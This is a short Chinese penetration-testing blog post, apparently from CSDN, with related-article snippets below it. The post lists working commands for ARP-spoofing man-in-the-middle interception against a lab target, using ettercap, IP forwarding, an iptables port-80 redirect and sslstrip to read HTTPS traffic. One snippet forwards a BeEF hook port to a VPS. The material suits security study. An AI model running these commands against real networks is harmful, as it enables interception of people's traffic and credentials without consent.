渗透测试之数据监听

最新推荐文章于 2023-01-11 14:41:37 发布
最新推荐文章于 2023-01-11 14:41:37 发布
阅读量353 收藏 2
点赞数 1
分类专栏: 渗透测试 文章标签: 渗透测试 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51393033/article/details/115320468
版权
本文详细介绍了如何使用Ettercap进行HTTP数据监听,包括设置中间人攻击并配合Wireshark抓包,以及如何通过iptables和SSLstrip实现HTTPS数据的拦截和信息获取,涉及ARP欺骗技巧。
摘要由CSDN通过智能技术生成

HTTP数据监听

首先使用Ettercap工具对靶机实施中间人攻击:

ettercap -Tq -M arp:remote /192.168.199.129// /192.168.199.2//

接着即可利用wireshark抓包工具监听靶机的数据包了。

HTTPS数据监听

首先需要开启路由转发:

echo 1 > /proc/sys/net/ipv4/ip_forward

接着通过iptables 将所有HTTP数据导入到自己指定的一个端口(如9999):

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9999

然后使用SSLstrip监听上面指定的9999端口,获取靶机传输的信息:

sslstrip -a -1 9999

最后实施ARP欺骗即可。

_Buran_
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
数据监听
weixin_33845881的博客
04-04 93
对象的监听 es5的Object.defineProperty是关键,一个已经定义好的对象,我们可以利用Object.defineProperty方法重写它的属性,添加get,set方法。 var obj = { name:"小明", age:18, say(){ return "hello"; } } for(let key in obj){ ...
VX数据侦听
HcwDavid12的博客
07-01 162
实现小程序中的数据侦听 最近接触的taro项目中使用了VX,因此记录一下了解到的内容,原文 在小程序项目中, 我们的通常会使用到使用到一个全局对象作为各个页面通用的数据存储容器, 将它绑定到app对象后, 就能在每一个页面都自由的操纵这个对象. 然而在实践中, 由于这个对象及其属性不具备响应式条件, 它不能直接参与业务逻辑的编写, 能力仅仅局限于数据储存. 若是在VueJS项目中, 我们可能经常使用到Vue.$watch去侦听某个数据是否发生变化, 小程序却缺乏这种能力. 在这篇文章中, 我将用150行代码
Vue数据侦听
weixin_43837268的博客
06-19 435
1.Watch data( ) { return { 'first':1 } }, watch: { first(newValue,oldValue) { console.log('新值--->>>',newValue) console.log('旧值--->>>',oldValue) } } ...
渗透测试笔记】之【将本地beef侦听的端口远程端口转发到云服务器】
AA8j的博客
12-27 514
1. 首先配置vps的ssh,允许外部访问vps端口: vi /etc/ssh/sshd_config 将 #GatewayPorts no 改为: GatewayPorts yes 2. vps添加防火墙规则,运行外网访问7000端口,并重启vps: 3. 在kali上进行远程端口转发,将本地beef侦听的3000转发到vps的7000端口上: ssh -CfNg -R 7000:127.0.0.1:3000 root@1.2.3.4 CfNg参数作用是压缩带宽,后台并发连接。 末尾跟vpsIP
源码vue中对数据侦听的一些理解---对象篇 图文
weixin_46613543的博客
08-19 110
vue的数据侦听流程图: 先放一张自己画的图,在继续向下看;(自己画的将就看看) 在vue2中,对于一个数据要被侦听,则是通过Object.definedProperty来实现,这个估计大家都知道。那么具体概述就是: 在getter中收集依赖,在setter中通知依赖更新 看一点源码: function defineReactive (obj,key,val) { if (arguments.length === 2) { val = obj[key] } if(typeof val =
读书笔记之python渗透测试.docx
最新发布
04-13
### 读书笔记之Python渗透测试知识点汇总 #### 黑盒测试工具 1. **Burp Suite**:一种常用的集成平台,用于执行Web应用程序的安全测试。它包含多种工具,如Proxy、Intruder、Spider等,可以帮助用户发现并利用Web...
渗透测试.pdf
07-15
基于网络的渗透测试中,ARP嗅探是一种常见的技术,它通过网卡设置为混合模式来捕获网络数据,可以捕获密码、机密信息或完整会话。ARP嗅探器是插入网络中用于监听通信的设备,而ARP攻击则是通过伪造IP地址和MAC地址来...
Android基础渗透测试
12-14
### Android基础渗透测试知识点 #### 概述 随着移动互联网技术的发展,Android系统因其开放性和易用性成为了全球范围内最受欢迎的移动操作系统之一。然而,这也让Android应用面临着各种各样的安全威胁。根据2017年...
渗透测试之Nmap扫描工具
07-31
渗透测试之Nmap扫描工具 Nmap是一个开源的网络探测和安全审核工具,也是渗透测试中常用的扫描工具。使用原始IP报文探测存活主机以及开放的端口,获取主机正在运行以及提供什么服务等信息,支持Window、Linux、Mac等...
渗透测试的车联网通信安全与防范措施研究.pdf
07-16
在车联网通信安全方面,渗透测试可以通过模拟攻击者的手段,深入分析通信协议的弱点,同时检测车联网系统内部是否能够有效隔离、控制权限,以及是否能够防止数据泄露和保护隐私等。 为应对车联网通信安全问题,以下...
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
网络监听攻击技术
xo2000的专栏
10-03 2832
 前言:  在网络中,当信息进行传播的时候,可以利用工具,将网络接口设置在监听的模式,便可将网络中正在传播的信息截获或者捕获到,从而进行攻击。网络监听在网络中的任何一个位置模式下都可实施进行。而黑客一般都是利用网络监听来截取用户口令。比如当有人占领了一台主机之后,那么他要再想将战果扩大到这个主机所在的整个局域网话,监听往往是他们选择的捷径。很多时候我在各类安全论坛上看到一些初学的爱好者,在他们认为
尝试使用ettercap监听
Syou的博客
04-05 4827
局域网:vmware虚拟网卡下NAT模式。 代号 主机名 ip地址 主机A Kali Linux 32位 192.168.233.129 主机B Kali Linux 64位 192.168.233.131 攻击机C Kali Linux 32位 192.168.233.130 (注意,攻击机C的ip是*.130,夹在A和B中间,不要搞混) 在攻击机终端上分别输入arp和ifconfig,查看本地局域网内mac地址映射关系。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保
渗透测试学习之靶机DC-3
xdbzdgx的博客
11-12 4668
1.下载靶机 本篇文章是DC靶机系列的第三篇,针对的是靶机DC-3,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-3的下载地址为DC: 3.2 ~ VulnHub。三个地址建议使用磁力下载,比较快。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 需要说明的是DC-3相较前两个靶机,它只有一个flag,便是最后一个flag,没有多余的提示了。 在VMware加载成功之后显示如下界面: 默.
Scapy:sniff函数剖析(参数分析)
m0_71713477的博客
01-11 4540
Scapy中sniff函数的剖析(参数分析)
渗透测试常用方法总结
MzHeader的博客
06-19 1万+
1 渗透流程 信息收集 漏洞验证/漏洞攻击 提权,权限维持 日志清理 其他 1 信息收集 一般先运行端口扫描和漏洞扫描获取可以利用的漏洞。多利用搜索引擎 端口扫描 有授权的情况下直接使用 nmap 、msscan 、自己写py脚本等端口扫描工具直接获取开放的端口和获取服务端的 banner 信息。 使用 Python 端口扫描的介绍 https://thief.one/2018/05/17/1...
简单网络嗅探器编写--------java
weixin_40789841的博客
01-20 1965
功能设计: 在设计之初,本设计被期望实现下面功能: ①有一个对用户友好的操作界面,使用户对软件上手快和操作简单; ②能对网卡进行选择,选择用户自己需要进行监听抓包的网卡; ③能够侦听所有进出本主机的数据包,完整显示数据包网络层和传输层的头信息。比如,对IP头而言,需要显示版本、头长度、服务类型、数据包长度、标识、DF/MF标志、段内偏移、生存期、协议类型、源目的IP地址、选项内容,并且要求...
Vue - 监听数据的三种方法
热门推荐
Welkin_qing的博客
08-11 13万+
举一个案例,我们要拼接一个fullname,因此要监听到文本框数据的改变,这样才能知道什么时候去拼接 出一个 fullname 案例结构如下: <body> <div id="app"> &
Kali渗透-ARP断网攻击与监听
道阻且长,行则将至。
02-29 3万+
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的 演示如何借助Kali Linux系统内置的 nmap、arpspoof、driftnet、ettercap 等渗透测试工具对局域网内(同WIFI下)同一网段的PC主机、手机进行 ARP 欺骗和 流量监听,实现对目标主机/手机的断网攻击、图片窃取、密码监听等攻击目的。 环境说明 主机 IP地址 Kali Linu...
Android基础渗透测试:入门与关键点解析
2. 服务端安全性(类似于WEB安全测试):虽然不是APK渗透测试的直接目标,但考虑到应用与服务器的交互,也需要评估传输过程中的加密措施和数据安全。 检测工具在渗透测试中扮演重要角色,如`jarsigner.exe`用于签名...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值